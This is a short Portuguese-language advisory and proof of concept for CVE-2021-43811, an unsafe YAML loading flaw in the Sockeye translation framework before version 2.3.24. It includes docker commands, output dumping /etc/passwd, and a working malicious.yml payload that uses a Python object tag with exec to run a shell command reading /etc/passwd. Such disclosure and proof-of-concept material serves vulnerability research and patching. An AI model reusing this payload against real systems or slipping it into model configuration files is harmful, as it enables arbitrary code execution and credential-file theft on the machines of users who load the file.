
awslabs/sockeye Injeção de código via carregamento inseguro de YAML CVE-2021-43811
awslabs/sockeye Injeção de código por meio de carregamento inseguro de YAML CVE-2021-43811
Sockeye é um framework open-source de sequência-a-sequência para Tradução Neural Automática construído sobre PyTorch. O Sockeye usa YAML para armazenar configurações de modelo e dados em disco. Versões anteriores à 2.3.24 usam carregamento inseguro de YAML, que pode ser utilizado para executar código arbitrário embutido em arquivos de configuração. Um atacante pode adicionar código malicioso ao arquivo de configuração de um modelo treinado e tentar convencer usuários a baixá-lo e executá-lo. Se os usuários executarem o modelo, o código embutido será executado localmente. O problema foi corrigido na versão 2.3.24.

docker build -t cve-2021-43811 .
docker run -it --rm cve-2021-43811
saída /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"